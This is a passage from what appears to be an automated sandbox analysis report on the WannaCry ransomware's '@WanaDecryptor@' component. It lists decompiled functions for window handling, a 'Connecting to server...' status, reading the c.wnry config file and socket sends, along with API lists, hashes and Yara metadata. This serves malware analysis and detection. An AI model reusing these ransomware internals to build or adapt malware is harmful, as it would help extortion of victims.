				 *((intOrPtr*)(__ecx + 0x78)) = 0;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
				 *((intOrPtr*)(__ecx + 0x80)) = 0;
				_v4 = 1;
				 *((intOrPtr*)(__ecx)) = 0x4161a4;
				 *((intOrPtr*)(_t50 + 0x58)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t50 + 0x60)) = GetSysColor(9);
				 *((intOrPtr*)(_t50 + 0x64)) = GetSysColor(0x12);
				_t53 = GetSysColor(2);
				_v20 = _t53;
				_v24 = 0;
				_t33 = SystemParametersInfoA(0x1008, 0,  &_v24, 0); // executed
				if(_t33 != 0 && _v24 != 0) {
					_t53 = GetSysColor(0x1b);
				}
				_push(0xffffffff);
				_push(2);
				L00412F50();
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)))) = _v28;
				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)) + 4)) = _t53;
				 *((intOrPtr*)(_t50 + 0x70)) = 0xa;
				 *((intOrPtr*)(_t50 + 0x68)) = 0;
				 *((intOrPtr*)(_t50 + 0x6c)) = 0x28;
				 *((intOrPtr*)(_t50 + 0x54)) = 0;
				 *((intOrPtr*)(_t50 + 0x5c)) = 0;
				 *[fs:0x0] = _v20;
				return _t50;
			}












                                                      0x004085c0
                                                      0x004085c2
                                                      0x004085cd
                                                      0x004085ce
                                                      0x004085db
                                                      0x004085de
                                                      0x004085e2
                                                      0x004085e7
                                                      0x004085f2
                                                      0x004085f6
                                                      0x00408601
                                                      0x00408604
                                                      0x00408607
                                                      0x0040860a
                                                      0x00408612
                                                      0x00408617
                                                      0x00408621
                                                      0x00408628
                                                      0x0040862f
                                                      0x00408634
                                                      0x00408642
                                                      0x00408646
                                                      0x0040864a
                                                      0x00408652
                                                      0x0040865e
                                                      0x0040865e
                                                      0x00408660
                                                      0x00408662
                                                      0x00408667
                                                      0x00408674
                                                      0x0040867d
                                                      0x00408680
                                                      0x00408687
                                                      0x0040868a
                                                      0x00408691
                                                      0x00408694
                                                      0x0040869c
                                                      0x004086a6

                                                      APIs
                                                      • #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                                      • #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                                      • GetSysColor.USER32 ref: 0040861D
                                                      • GetSysColor.USER32(00000009), ref: 00408624
                                                      • GetSysColor.USER32(00000012), ref: 0040862B
                                                      • GetSysColor.USER32(00000002), ref: 00408632
                                                      • KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                                      • GetSysColor.USER32(0000001B), ref: 0040865C
                                                      • #6140.MFC42(00000002,000000FF), ref: 00408667
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Color$#341#567#6140CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2603677082-0
                                                      • Opcode ID: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                                      • Instruction ID: 8505b43e8b24dba0e9a20122b4cf5018a120a2575fdff98832e5101b57525ea5
                                                      • Opcode Fuzzy Hash: 51668d6117463ada0c326ac575935f99ab198cb4b06a73068adc63a74b909c1d
                                                      • Instruction Fuzzy Hash: 7D2159B0900B449FD320DF2AC985B96FBE4FF84B14F504A2FE19687791D7B9A844CB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040B620 Relevance: 13.5, APIs: 9, Instructions: 45windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040B620(WCHAR* _a4, struct HWND__* _a8) {
				struct HWND__* _t4;
				struct HWND__* _t15;

				_t4 = FindWindowW(0, _a4); // executed
				_t15 = _t4;
				if(_t15 != 0) {
					ShowWindow(_t15, 5); // executed
					SetWindowPos(_t15, 0xffffffff, 0, 0, 0, 0, 0x43);
					SetWindowPos(_t15, 0xfffffffe, 0, 0, 0, 0, 0x43);
					SetForegroundWindow(_t15); // executed
					SetFocus(_t15);
					SetActiveWindow(_t15);
					BringWindowToTop(_t15);
					_t4 = _a8;
					if(_t4 != 0) {
						ExitProcess(0);
					}
				}
				return _t4;
			}





                                                      0x0040b628
                                                      0x0040b62e
                                                      0x0040b632
                                                      0x0040b638
                                                      0x0040b651
                                                      0x0040b660
                                                      0x0040b663
                                                      0x0040b66a
                                                      0x0040b671
                                                      0x0040b678
                                                      0x0040b67e
                                                      0x0040b685
                                                      0x0040b689
                                                      0x0040b689
                                                      0x0040b685
                                                      0x0040b690

                                                      APIs
                                                      • FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                                      • ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                                      • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                                      • SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                                      • KiUserCallbackDispatcher.NTDLL(00000000), ref: 0040B663
                                                      • SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                                      • SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                                      • BringWindowToTop.USER32(00000000), ref: 0040B678
                                                      • ExitProcess.KERNEL32 ref: 0040B689
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$ActiveBringCallbackDispatcherExitFindFocusProcessShowUser
                                                      • String ID:
                                                      • API String ID: 3379167612-0
                                                      • Opcode ID: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                                      • Instruction ID: 32f88169c1f0d7c0e12a36757c7a64a26434f73f58f3758d5628eaed19e7f987
                                                      • Opcode Fuzzy Hash: ec9fc34e90d3c79d5292e19d7f02050e94f93b43ef6df305d89d1d3c5b01f4c1
                                                      • Instruction Fuzzy Hash: 66F0F431245A21F7E2315B54AC0DFDF3655DFC5B21F214610F715791D4CB6455018AAD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401140 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowtimethreadCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E00401140() {
				intOrPtr _v4;
				void* _t16;
				void* _t17;
				struct HWND__* _t18;
				void* _t23;
				intOrPtr _t24;

				_t23 = _t17;
				L00412CB0();
				SendMessageA( *(_t23 + 0x80), 0x404, 1, 0);
				_t18 =  *(_t23 + 0x80);
				SendMessageA(_t18, 0x401, 0, 0x280000);
				_push(_t18);
				 *((intOrPtr*)(_t23 + 0xb0)) = 0x1e;
				_v4 = _t24;
				L00412CAA();
				E00401970("Connecting to server...");
				 *(_t23 + 0xa8) = 0;
				SetTimer( *(_t23 + 0x20), 0x3e9, 0x3e8, 0); // executed
				if( *((intOrPtr*)(_t23 + 0xa0)) != 0) {
					_t16 = CreateThread(0, 0, E004012D0, _t23, 0, 0); // executed
					 *(_t23 + 0xac) = _t16;
				}
				return 1;
			}









                                                      0x00401143
                                                      0x00401145
                                                      0x00401160
                                                      0x00401162
                                                      0x00401175
                                                      0x00401177
                                                      0x00401178
                                                      0x00401184
                                                      0x0040118d
                                                      0x00401194
                                                      0x004011a9
                                                      0x004011b3
                                                      0x004011c1
                                                      0x004011d1
                                                      0x004011d7
                                                      0x004011d7
                                                      0x004011e5

                                                      APIs
                                                      • #4710.MFC42 ref: 00401145
                                                      • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
                                                      • SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
                                                      • #537.MFC42(Connecting to server...), ref: 0040118D
                                                        • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                                        • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                                        • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                                      • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_000012D0,?,00000000,00000000), ref: 004011D1
                                                      Strings
                                                      • Connecting to server..., xrefs: 00401188
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#3092#4710#537#6199#800CreateThreadTimer
                                                      • String ID: Connecting to server...
                                                      • API String ID: 3305248171-1849848738
                                                      • Opcode ID: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                                      • Instruction ID: 074e0af6858d04fd3a88c2e6ba563778cf6a67133e9310fa302bc50ac74eac6c
                                                      • Opcode Fuzzy Hash: aade00bc90c5f3efc1f806a2182fbe742cea5c73be26a938389ce35b89292200
                                                      • Instruction Fuzzy Hash: 480175B0390700BBE2305B66CC46F8BB694AF84B50F10851EF349AA2D0CAF474018B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401220 Relevance: 10.6, APIs: 7, Instructions: 53windowtimeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00401220(void* __ecx, long _a4) {
				long _t11;
				void* _t26;

				_t11 = _a4;
				_t26 = __ecx;
				if(_t11 != 0x3e9) {
					L8:
					L00412CBC();
					return _t11;
				}
				if( *((intOrPtr*)(__ecx + 0xa8)) != 0) {
					SendMessageA( *(__ecx + 0x80), 0x402, 0x28, 0);
					KillTimer( *(_t26 + 0x20), 0x3e9);
					L00412B66();
				}
				if(SendMessageA( *(_t26 + 0x80), 0x408, 0, 0) <  *((intOrPtr*)(_t26 + 0xb0))) {
					SendMessageA( *(_t26 + 0x80), 0x405, 0, 0); // executed
				}
				_t11 =  *(_t26 + 0xa0);
				if(_t11 == 0) {
					_t11 = SendMessageA( *(_t26 + 0x80), 0x408, 0, 0);
					if(_t11 == 0xf) {
						 *((intOrPtr*)(_t26 + 0xa8)) = 0xffffffff;
					}
				}
				goto L8;
			}





                                                      0x00401220
                                                      0x0040122b
                                                      0x0040122d
                                                      0x004012c2
                                                      0x004012c4
                                                      0x004012cb
                                                      0x004012cb
                                                      0x00401241
                                                      0x00401253
                                                      0x0040125e
                                                      0x00401266
                                                      0x00401266
                                                      0x00401283
                                                      0x00401295
                                                      0x00401295
                                                      0x00401297
                                                      0x0040129f
                                                      0x004012b1
                                                      0x004012b6
                                                      0x004012b8
                                                      0x004012b8
                                                      0x004012b6
                                                      0x00000000

                                                      APIs
                                                      • SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
                                                      • KillTimer.USER32(?,000003E9), ref: 0040125E
                                                      • #4853.MFC42 ref: 00401266
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
                                                      • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
                                                      • #2379.MFC42 ref: 004012C4
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#2379#4853KillTimer
                                                      • String ID:
                                                      • API String ID: 178170520-0
                                                      • Opcode ID: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                                      • Instruction ID: aacaf11b8525f3fa08346ebc997e4185e7a595c9bc7dc659aa73715d177cc548
                                                      • Opcode Fuzzy Hash: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                                      • Instruction Fuzzy Hash: FD114475340B00ABD6709A74CD41F6BB3D4BB94B10F20892DF395FB2D0DAB4B8068B58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401A10 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: fclose$fopenfreadfwrite
                                                      • String ID: c.wnry
                                                      • API String ID: 2140422903-3240288721
                                                      • Opcode ID: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                                      • Instruction ID: f5186b7865cb40674a519f70d39de74d6a09c830656aa5640d665e45194f203f
                                                      • Opcode Fuzzy Hash: 6e9b76c3277035fe504f344658f288149f4646c70a2b683330cc54d29e3cf444
                                                      • Instruction Fuzzy Hash: 0DF0FC31746310EBD3209B19BD09BD77A56DFC0721F450436FC0ED63A4E2799946899E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406CF0 Relevance: 7.5, APIs: 5, Instructions: 48windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E00406CF0(void* __ecx, intOrPtr _a4) {
				int _v12;
				intOrPtr _v20;
				void* _v28;
				char _v36;
				intOrPtr _v40;
				void* _v48;
				struct HWND__* _t16;
				void* _t21;
				void* _t34;
				intOrPtr _t36;

				_push(0xffffffff);
				_push(E00413E78);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t36;
				_t34 = __ecx;
				_t16 = __ecx + 0x4c0;
				if(_t16 != 0) {
					_t16 =  *(_t16 + 0x20);
				}
				SendMessageA(_t16, 0x445, 0, 0x4000000);
				_push(0);
				_push(_a4);
				L00412F44(); // executed
				_v12 = 0;
				_v48 =  &_v36;
				_v40 = E00406DA0;
				SendMessageA( *(_t34 + 0x4e0), 0x449, 2,  &_v48); // executed
				L00412F3E();
				_t21 = E00406DC0(_t34);
				_v12 = 0xffffffff;
				L00412F38();
				 *[fs:0x0] = _v20;
				return _t21;
			}













                                                      0x00406cf6
                                                      0x00406cf8
                                                      0x00406cfd
                                                      0x00406cfe
                                                      0x00406d09
                                                      0x00406d0c
                                                      0x00406d14
                                                      0x00406d16
                                                      0x00406d16
                                                      0x00406d2c
                                                      0x00406d32
                                                      0x00406d34
                                                      0x00406d39
                                                      0x00406d55
                                                      0x00406d5d
                                                      0x00406d61
                                                      0x00406d69
                                                      0x00406d6f
                                                      0x00406d76
                                                      0x00406d7f
                                                      0x00406d87
                                                      0x00406d92
                                                      0x00406d9c

                                                      APIs
                                                      • SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
                                                      • #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,767B20C0), ref: 00406D39
                                                      • SendMessageA.USER32 ref: 00406D69
                                                      • #1979.MFC42 ref: 00406D6F
                                                      • #665.MFC42 ref: 00406D87
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#1979#353#665
                                                      • String ID:
                                                      • API String ID: 3794212480-0
                                                      • Opcode ID: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                                      • Instruction ID: 970bbd2b9484f858b006173e4a833a93101fbe0026f1fdcd253c6fb41473c1ec
                                                      • Opcode Fuzzy Hash: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                                      • Instruction Fuzzy Hash: EA1170B1244701AFD210EF15C942F9BB7E4BF94B14F504A1EF156A72C0C7B8A905CB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407DB0 Relevance: 7.5, APIs: 5, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E00407DB0(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v100;
				char _v196;
				void* _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr _t26;
				void* _t28;

				 *[fs:0x0] = _t26;
				E00401000( &_v196, 0);
				_t24 = __imp__time;
				_v8 = 0;
				_t14 =  *_t24(0, _t23,  *[fs:0x0], E00413FA6, 0xffffffff);
				_t22 =  *0x4218a0; // 0x0
				_t28 = _t26 - 0xb8 + 4;
				if(_t14 - _t22 < 0x12c) {
					_v36 = 0;
				}
				_v32 = 0;
				L00412B72(); // executed
				_t16 = _v28;
				if(_t16 >= 0) {
					_t16 =  *_t24(0);
					_t28 = _t28 + 4;
					 *0x4218a0 = _t16;
				}
				 *0x4218a4 =  *0x4218a4 + 1;
				_v4 = 1;
				L00412C9E();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t16;
			}


















                                                      0x00407dbe
                                                      0x00407dd2
                                                      0x00407dd7
                                                      0x00407ddf
                                                      0x00407dea
                                                      0x00407dec
                                                      0x00407df2
                                                      0x00407dfc
                                                      0x00407dfe
                                                      0x00407dfe
                                                      0x00407e0d
                                                      0x00407e18
                                                      0x00407e1d
                                                      0x00407e26
                                                      0x00407e2a
                                                      0x00407e2c
                                                      0x00407e2f
                                                      0x00407e2f
                                                      0x00407e34
                                                      0x00407e3e
                                                      0x00407e49
                                                      0x00407e52
                                                      0x00407e5d
                                                      0x00407e6a
                                                      0x00407e77

                                                      APIs
                                                        • Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
                                                        • Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039
                                                      • time.MSVCRT ref: 00407DEA
                                                      • #2514.MFC42 ref: 00407E18
                                                      • time.MSVCRT ref: 00407E2A
                                                      • #765.MFC42 ref: 00407E49
                                                      • #641.MFC42 ref: 00407E5D
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: time$#2514#324#567#641#765
                                                      • String ID:
                                                      • API String ID: 3372871541-0
                                                      • Opcode ID: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                                      • Instruction ID: 27345a9b2c1eb8b6f7bb2a745056f56b64ece2280f016bc8de7da71c9126f67a
                                                      • Opcode Fuzzy Hash: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                                      • Instruction Fuzzy Hash: 4C11AD70A097809FE320EF24CA41BDA77E0BB94714F40462EE589872D0EB786445CB97
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040DAD0 Relevance: 6.0, APIs: 4, Instructions: 45networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: closesocketsendsetsockoptshutdown
                                                      • String ID:
                                                      • API String ID: 4063721217-0
                                                      • Opcode ID: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                                      • Instruction ID: 511c5ca045328faec3d78f5435f76df0282562355462c5d2c83a81ecee0c9610
                                                      • Opcode Fuzzy Hash: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                                      • Instruction Fuzzy Hash: 9D014075200B40ABD3208B28C849B97B7A5AF89721F808B2CF6A9962D0D7B4A4088795
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401970 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 55%
                                                      			E00401970(intOrPtr _a4) {
				intOrPtr _v4;
				intOrPtr _v12;
				intOrPtr _t6;
				intOrPtr* _t10;

				_push(0xffffffff);
				_push(E004134D8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t10;
				_t6 = _a4;
				_v4 = 0;
				_push(_t6);
				_push(0x406);
				L00412CE6();
				L00412CE0(); // executed
				_v12 = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] =  *_t10;
				return _t6;
			}







                                                      0x00401976
                                                      0x00401978
                                                      0x0040197d
                                                      0x0040197e
                                                      0x00401985
                                                      0x00401989
                                                      0x00401991
                                                      0x00401992
                                                      0x00401997
                                                      0x0040199e
                                                      0x004019a7
                                                      0x004019af
                                                      0x004019b8
                                                      0x004019c2

                                                      APIs
                                                      • #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                                      • #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                                      • #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3092#6199#800
                                                      • String ID:
                                                      • API String ID: 3924541682-0
                                                      • Opcode ID: ecd91130295bb8af0247287c9129cb1c8204aaf667e5a628a3bd86e63acab10a
                                                      • Instruction ID: e5ca7d8525ee00d79fb0b85b86dd9e556083ecc507c08eb16956c090e8f9caf4
                                                      • Opcode Fuzzy Hash: ecd91130295bb8af0247287c9129cb1c8204aaf667e5a628a3bd86e63acab10a
                                                      • Instruction Fuzzy Hash: 9DE04FB5248781ABD310DF14C942B6EBBA4FB94B20F208F1DF665937C0D77C9454CA66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004043E0 Relevance: 4.5, APIs: 3, Instructions: 15COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 50%
                                                      			E004043E0(void* __ecx) {
				void* _t3;

				_push(1);
				_push(0x100);
				_push(0);
				L00412DDC();
				_t3 = __ecx + 0x40;
				_push(_t3); // executed
				L00412DD6(); // executed
				 *((char*)(__ecx + 0x5a)) = 0;
				L00412C14();
				return _t3;
			}




                                                      0x004043e1
                                                      0x004043e3
                                                      0x004043ea
                                                      0x004043ec
                                                      0x004043f1
                                                      0x004043f6
                                                      0x004043f7
                                                      0x004043fe
                                                      0x00404402
                                                      0x00404408

                                                      APIs
                                                      • #4284.MFC42(00000000,00000100,00000001), ref: 004043EC
                                                      • #3874.MFC42(?,00000000,00000100,00000001), ref: 004043F7
                                                      • #5277.MFC42 ref: 00404402
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
